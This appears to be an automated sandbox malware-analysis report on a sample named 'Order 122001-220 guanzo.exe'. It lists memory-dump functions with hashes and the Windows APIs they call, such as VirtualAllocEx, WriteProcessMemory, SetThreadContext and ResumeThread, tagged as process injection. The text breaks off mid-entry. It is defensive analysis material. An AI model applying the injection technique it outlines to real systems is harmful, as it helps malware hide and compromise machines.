                                                                        Analysis Process: Order 122001-220 guanzo.exe PID: 864 Parent PID: 5948 Order 122001-220 guanzo.exeCOMMON

                                                                        Executed Functions

                                                                        Function 0ADBB268, Relevance: 1.9, Strings: 1, Instructions: 614COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $%&l
                                                                        • API String ID: 0-3075001641
                                                                        • Opcode ID: 7b17cec6be93d969d222c4b9d91e80dfed09e13aeb526def96d94ad35eb4113c
                                                                        • Instruction ID: 10381a4f06f88e72bff0f8493d90517e4e08ead8cd53d79d4419da2e68b8cd90
                                                                        • Opcode Fuzzy Hash: 7b17cec6be93d969d222c4b9d91e80dfed09e13aeb526def96d94ad35eb4113c
                                                                        • Instruction Fuzzy Hash: 41328770B21204DFDB25DB65C490BEEB7F6AF89700F5240AAE5469B3A0CB35ED01CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB734C, Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0ADB758E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 6ee09115d936b2311f28c8c380c2cac1e36b2732998f9bc57a6c6c9f67fd4ff8
                                                                        • Instruction ID: 7b9e9341070fd877ad01a682afb94eee643d42f4132fc9c511c18b9840ebdef4
                                                                        • Opcode Fuzzy Hash: 6ee09115d936b2311f28c8c380c2cac1e36b2732998f9bc57a6c6c9f67fd4ff8
                                                                        • Instruction Fuzzy Hash: 4CA17D71D11219CFDB10CFA8C881BEEBBB2FF88314F4585A9D819A7240DB749985CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB7358, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0ADB758E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 28f9e02a0624d86df77a22990599d1113d43316736982f318673ff97a29fbaf4
                                                                        • Instruction ID: 026feab74483bcb002e0b4df65439287352a2f9d9bffa1b34151e9a40eb7fb22
                                                                        • Opcode Fuzzy Hash: 28f9e02a0624d86df77a22990599d1113d43316736982f318673ff97a29fbaf4
                                                                        • Instruction Fuzzy Hash: C9917E71D11219CFDF10CFA9C841BEEBBB2BF88314F4585A9D819A7240DB749985CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB6A41, Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0ADB6AD8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 2b587147dd32cfee6e41135339d356fd8174a4dcf8c44316ff265c56582a247c
                                                                        • Instruction ID: 3edaafdd84072d0e93f221ec65064e2bc82980bb5ae955dcfb0523423e038770
                                                                        • Opcode Fuzzy Hash: 2b587147dd32cfee6e41135339d356fd8174a4dcf8c44316ff265c56582a247c
                                                                        • Instruction Fuzzy Hash: 632133B19002199FCF10CFAAC884BDEBBB5FF48314F51842AE959A7240D7789A55CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB6A48, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0ADB6AD8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: abc1815eb18b2cb4d83593f2f443157bef51c139d4d8dd4c5123e2f4ee00b94d
                                                                        • Instruction ID: 27dae8ef84965b294b1d7c7dc07acc92b4cf28c036f72638a500faedfac520d3
                                                                        • Opcode Fuzzy Hash: abc1815eb18b2cb4d83593f2f443157bef51c139d4d8dd4c5123e2f4ee00b94d
                                                                        • Instruction Fuzzy Hash: 452133B19002099FCF10CFAAC884BDEBBF5FF48314F01842AE919A7240C778A954CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB68A8, Relevance: 1.6, APIs: 1, Instructions: 68threadinjectionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 0ADB692E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ContextThread
                                                                        • String ID:
                                                                        • API String ID: 1591575202-0
                                                                        • Opcode ID: cb0b531c0b36c7731752fd3f17ccf9c9d43a48c10e60448dff0f464525fdc5b6
                                                                        • Instruction ID: e7006d8f5a9242ebd19537366f31d1ae0c25a191765cc00b33780b21b4ae3ff5
                                                                        • Opcode Fuzzy Hash: cb0b531c0b36c7731752fd3f17ccf9c9d43a48c10e60448dff0f464525fdc5b6
                                                                        • Instruction Fuzzy Hash: 2A213A719103098FDB10CFAAC4857EEBBF4EF48224F55842AD559A7240DB78A945CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB6B30, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0ADB6BB8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: b554721c868de60024d373db2431c3f6e30ab40fcfe071afb4641cd75a34ce64
                                                                        • Instruction ID: e9b5d68431b3a18083de9d73246ffb5ab2e237a7655d1ce4e62d7aa426126928
                                                                        • Opcode Fuzzy Hash: b554721c868de60024d373db2431c3f6e30ab40fcfe071afb4641cd75a34ce64
                                                                        • Instruction Fuzzy Hash: 02213B71800219DFCB10CFA9C8847DEFBB5FF48314F018429D969A7240D7389555CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB68B0, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 0ADB692E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ContextThread
                                                                        • String ID:
                                                                        • API String ID: 1591575202-0
                                                                        • Opcode ID: e9a7b996299ece61b03947cd369e2873e02c80558d990ee0faa602cb0f4fe895
                                                                        • Instruction ID: ba85908d3cc369974f4c0313ea0faa5d20ab1e328f00ec1aa935ba18c2fa3a43
                                                                        • Opcode Fuzzy Hash: e9a7b996299ece61b03947cd369e2873e02c80558d990ee0faa602cb0f4fe895
                                                                        • Instruction Fuzzy Hash: 7A2118719102098FDB10CFAAC4847EEBBF5EF48224F55842AD559A7240DB78A945CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB6B38, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0ADB6BB8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: 0460d0a6bf493805710df2c49e27536832239757d3950b0a7958827040a82d67
                                                                        • Instruction ID: f6be093d8e1c75bbf8803fea1f27152a6866c5fc5f0c5dc8efd3e15be32ef890
                                                                        • Opcode Fuzzy Hash: 0460d0a6bf493805710df2c49e27536832239757d3950b0a7958827040a82d67
                                                                        • Instruction Fuzzy Hash: 8F2125B1800249DFCB10CFAAC884BEEFBF5FF48314F51842AE919A7240C7789954CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB26E9, Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0ADB2763
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: ddf5fdeb202408fda44039d25e7ebef66d8fa5b3054625a74900f05a91bad1ce
                                                                        • Instruction ID: c4417844ff8f9913dbb5afcf1ebb64604a5de23b426eca780b6f04089f4be8fd
                                                                        • Opcode Fuzzy Hash: ddf5fdeb202408fda44039d25e7ebef66d8fa5b3054625a74900f05a91bad1ce
                                                                        • Instruction Fuzzy Hash: FB2108B5900209DFDB10CF9AC585BDEFBF4FB48324F108429E558A7240D374A945CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB6981, Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0ADB69F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 6e350d942c913ea733ec0c0e9474b47e1b8edf7bc33140cd42e7f4dc3802bc52
                                                                        • Instruction ID: 36fe685acc6831c5b1a5c0765d13377878e7e00dd56faad8b89031f4798c955d
                                                                        • Opcode Fuzzy Hash: 6e350d942c913ea733ec0c0e9474b47e1b8edf7bc33140cd42e7f4dc3802bc52
                                                                        • Instruction Fuzzy Hash: 041156718002488FCF10CFAAC884BDFBBF5EF88324F11842AD969A7200C7799955CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB26F0, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0ADB2763
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ProtectVirtual
                                                                        • String ID:
                                                                        • API String ID: 544645111-0
                                                                        • Opcode ID: 005aa4a77d0189f6259c2a18c0e2ca3114f9f7a469c7cc670bc30db40dd5b3a9
                                                                        • Instruction ID: 292a3de2b48ece7cc7c9f6a606296c6f0026c0c3a852aadc544df3a5ef159568
                                                                        • Opcode Fuzzy Hash: 005aa4a77d0189f6259c2a18c0e2ca3114f9f7a469c7cc670bc30db40dd5b3a9
                                                                        • Instruction Fuzzy Hash: 5421E7B5900209DFCB10CF9AC584BDEFBF4FB48320F118429E959A7250D378A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB67F8, Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 65a1532ab0b00374abd731b3eb6257b4e31fbf6597f4d189d96a99384c331465
                                                                        • Instruction ID: 41ff09e66d192197e7bb99356ea545138ca40e8d3db46c5a5143c1e425f5af65
                                                                        • Opcode Fuzzy Hash: 65a1532ab0b00374abd731b3eb6257b4e31fbf6597f4d189d96a99384c331465
                                                                        • Instruction Fuzzy Hash: A91128B1D042488FCB10DFAAD4847EFFBF9EF88228F158429D559A7240C775A945CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB6988, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0ADB69F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: b73b9360db46d0728ebaab8a314e554a47006a7f17c305bcc7d9cc58557e7815
                                                                        • Instruction ID: 6ffb6bb7f88137a413ba2008fe66742c1a94d4959b68a63ef2f96b7d30863d4c
                                                                        • Opcode Fuzzy Hash: b73b9360db46d0728ebaab8a314e554a47006a7f17c305bcc7d9cc58557e7815
                                                                        • Instruction Fuzzy Hash: 861126719002499FCF10DFAAC844BDFBBF5AF88324F15842AD525A7250C775A954CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB6800, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 07d2aea626e4fde18c525d3307c4047d1d96f2fbb1c596beb4fdc2d99c413e9b
                                                                        • Instruction ID: 8aa2c5525ee457702c148d0ec6b426f653681a5d8443cde0989de2b1e6b280c2
                                                                        • Opcode Fuzzy Hash: 07d2aea626e4fde18c525d3307c4047d1d96f2fbb1c596beb4fdc2d99c413e9b
                                                                        • Instruction Fuzzy Hash: 891125B19042488BCB10DFAAD4447EEFBF9AB88224F15842AC529A7240C778A944CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB2960, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0ADBA31D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: 7ecf770e46cda6035fb5bdab8a9a81c3c189012684b52069ac3683bb1a574a78
                                                                        • Instruction ID: 59075d8723ccc01b5142888ec4685dba494051024188aced05aa1396b8a76a2e
                                                                        • Opcode Fuzzy Hash: 7ecf770e46cda6035fb5bdab8a9a81c3c189012684b52069ac3683bb1a574a78
                                                                        • Instruction Fuzzy Hash: 5F11F2B5804209DFDB20CF9AD889BDFBBF8EB48320F11845AE955A7710D375A944CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 006ED01C, Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.671909262.00000000006ED000.00000040.00000001.sdmp, Offset: 006ED000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 45725f79f1291a0f597be7401a44d184d21631829702bde46e35c1f31a12a738
                                                                        • Instruction ID: 23802a499c3d40e2f3392976bff6b256fb7df3f638100c86fd103eacb9408932
                                                                        • Opcode Fuzzy Hash: 45725f79f1291a0f597be7401a44d184d21631829702bde46e35c1f31a12a738
                                                                        • Instruction Fuzzy Hash: 0C2107B1504384DFDB14CF10D5C4B16BBA6FB84314F28C56DD9094B346C336D847CA61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 006ED006, Relevance: .1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.671909262.00000000006ED000.00000040.00000001.sdmp, Offset: 006ED000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a50514ec1257cf569b46b13018f77c74a6b1a79dd185fe273f272edbcee8849e
                                                                        • Instruction ID: 3f8f2319d2407a4afee6ff369a88b69cb53d8f3078daf2497c998f25f014d3a3
                                                                        • Opcode Fuzzy Hash: a50514ec1257cf569b46b13018f77c74a6b1a79dd185fe273f272edbcee8849e
                                                                        • Instruction Fuzzy Hash: 4E2150755093C08FCB12CF24D994755BF71EB46314F28C5DAD8498B6A7C33A984ACB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 0ADB0007, Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;5C
                                                                        • API String ID: 0-1261206579
                                                                        • Opcode ID: bef90648dc58769071ef95c3bb665b35995ecc979a9b6c55e535996650acb311
                                                                        • Instruction ID: 8e2c428a4c5dd79750de066fced089f699309fbc7801288781af5c6db4b88430
                                                                        • Opcode Fuzzy Hash: bef90648dc58769071ef95c3bb665b35995ecc979a9b6c55e535996650acb311
                                                                        • Instruction Fuzzy Hash: 13519AB1E056588FDB19CF6B8D5428AFBF3AFC9200F19C1FAC448AB265DB3449468F11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB0040, Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;5C
                                                                        • API String ID: 0-1261206579
                                                                        • Opcode ID: 4ef797e5d67659ffa2fb7631ab89057e05f76a184f7b3503a621bbe4d5d3748d
                                                                        • Instruction ID: 8f234304a5dd766cf61ca6b5f55d6655d31fbd871c6cf3b2651b559e40c97f44
                                                                        • Opcode Fuzzy Hash: 4ef797e5d67659ffa2fb7631ab89057e05f76a184f7b3503a621bbe4d5d3748d
                                                                        • Instruction Fuzzy Hash: 51415CB1E15618CBEB18CF6B8D4429EFBF3BFC9300F14C1BA850DA6214DB344A468E11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB4B70, Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: dcu`
                                                                        • API String ID: 0-3228247770
                                                                        • Opcode ID: 89304b0cfbb44b9f5b4876f0384b06a9c9c5131a70690a838ae7b862a9df8046
                                                                        • Instruction ID: 8b29b63c3ced3b1a206e36789b870858645db7723fd0997eab630221c90463ca
                                                                        • Opcode Fuzzy Hash: 89304b0cfbb44b9f5b4876f0384b06a9c9c5131a70690a838ae7b862a9df8046
                                                                        • Instruction Fuzzy Hash: 1B1106B1E11219DBDB58CFAAD8406EEFBF7BBC8210F14C02AD509A7214DB304A018B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB4B61, Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: dcu`
                                                                        • API String ID: 0-3228247770
                                                                        • Opcode ID: 840ea2c2a820cdb8da9647031815d3b320b9e7a0aa71ab140f31333b491c8cc1
                                                                        • Instruction ID: f28d7b19f3d98af80f1db90fb003f2eeb55ae47ba469dc078fc97833a6b3579c
                                                                        • Opcode Fuzzy Hash: 840ea2c2a820cdb8da9647031815d3b320b9e7a0aa71ab140f31333b491c8cc1
                                                                        • Instruction Fuzzy Hash: 601126B1E116599BDB58CFABD9406AEBAF7BFC8200F14C03AD409AA255DB305A018B55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB4888, Relevance: .2, Instructions: 178COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3fe3d1b61b2a0bec0e21888e25c5bc0c6ed9b3a4e0dc94a4782209dc11b9908c
                                                                        • Instruction ID: 4d11b826e8d3d243f4b795575a64aae31cec58a1f9e5b80d7f60ea9fa9312ad7
                                                                        • Opcode Fuzzy Hash: 3fe3d1b61b2a0bec0e21888e25c5bc0c6ed9b3a4e0dc94a4782209dc11b9908c
                                                                        • Instruction Fuzzy Hash: 8A6138B4E1520ADFCF04CFAAC541AEEFBF2AB88310F15D42AD516AB215D734DA418F94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB4877, Relevance: .2, Instructions: 178COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 98985a1fa485449acc56663d86fd0e424e83ae781a40d91c74e52619d72fe375
                                                                        • Instruction ID: 43056cb070dfb9c29aaf7d5e9d672e6c47ea7a591c52923b9a262eada039ba33
                                                                        • Opcode Fuzzy Hash: 98985a1fa485449acc56663d86fd0e424e83ae781a40d91c74e52619d72fe375
                                                                        • Instruction Fuzzy Hash: 816159B0E1524ADFDF04CFAAC541AEEFBF2AB88210F15D42AD525AB215D734DA418F90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB8998, Relevance: .1, Instructions: 143COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e33ae0dc47ef2497bad23f8b3a81c1fd7ce991eb0f44bc12c46963387983f25
                                                                        • Instruction ID: 5cc54fa3ef5c89f3c9675ef1afcc10b1e852121db70338e370a835f3ee106fcd
                                                                        • Opcode Fuzzy Hash: 5e33ae0dc47ef2497bad23f8b3a81c1fd7ce991eb0f44bc12c46963387983f25
                                                                        • Instruction Fuzzy Hash: 92513970E14669CBDB68CF66C8447EDB7B6ABC9300F05C5AAC50EB7600EB309A858F04
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB8988, Relevance: .1, Instructions: 140COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5383f6014a5b858a6961d7a302b63418c3aa10f5f39a1094b0748713ce5e69f1
                                                                        • Instruction ID: 9a34ddc86133c15bffd9ba2959e75f2e5f5cd2bc43deb29442ffd4ed5ae9cb61
                                                                        • Opcode Fuzzy Hash: 5383f6014a5b858a6961d7a302b63418c3aa10f5f39a1094b0748713ce5e69f1
                                                                        • Instruction Fuzzy Hash: 2F512971E10659CBDB68CF66C8447DEB7B2FBC9300F14C5AAD50AB7600EB309A868F54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB6C18, Relevance: .1, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0563b14f791fa9a45a6e5be8ae5d320e744b266e6213254f2ee75c7c4a836ef5
                                                                        • Instruction ID: ce787361836a947a8216c0b95dca41c58be9c8e7856448abf2688086cccf6d32
                                                                        • Opcode Fuzzy Hash: 0563b14f791fa9a45a6e5be8ae5d320e744b266e6213254f2ee75c7c4a836ef5
                                                                        • Instruction Fuzzy Hash: 45518F70E14119DBDB18CFA6C980AAEFBF2FF89304F25C16AD519A7215DB309A41DF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB6C08, Relevance: .1, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3ed8b3f7015bf25ca9c54181a07f08ac3b9f63a701319e34fe2238ef67d630e
                                                                        • Instruction ID: 0e9821d2c316ffdb15970b75f822782011521c333d23fd65671a28a7a93110bf
                                                                        • Opcode Fuzzy Hash: a3ed8b3f7015bf25ca9c54181a07f08ac3b9f63a701319e34fe2238ef67d630e
                                                                        • Instruction Fuzzy Hash: 77519E70E14119DBDB18CFA5C980AADFBF2FF89200F25C1AAD519A7215DB309942DF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB3A60, Relevance: .1, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6b8e10546bc5c29dffb8efe7965b5a923da5d5c37c8465914903eb236d0d73db
                                                                        • Instruction ID: 63a601ed734d400b4387e5f2e2a1a9159d378baf607a52ebfb79cdc19ff06b54
                                                                        • Opcode Fuzzy Hash: 6b8e10546bc5c29dffb8efe7965b5a923da5d5c37c8465914903eb236d0d73db
                                                                        • Instruction Fuzzy Hash: EA41E370E16216DFCB49CF66C8506AEFFB2FF8A200F25C0AAC504AB605D7308941DF15
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB3AB8, Relevance: .1, Instructions: 81COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3176108e5189fe578ade750fc8983825d948294b801dcfdbe18aec8cf8d23a0f
                                                                        • Instruction ID: c17435e8c4c9682b50bbdc0715963c05d1b9fcecd2c79e0ee5be0ef3272a31a6
                                                                        • Opcode Fuzzy Hash: 3176108e5189fe578ade750fc8983825d948294b801dcfdbe18aec8cf8d23a0f
                                                                        • Instruction Fuzzy Hash: 28315CB0E11219DBDB18CFAAD8416EEFBB3FBC8210F15C17AD509AB254DB349A058F15
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0ADB3411, Relevance: .1, Instructions: 73COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.675790687.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
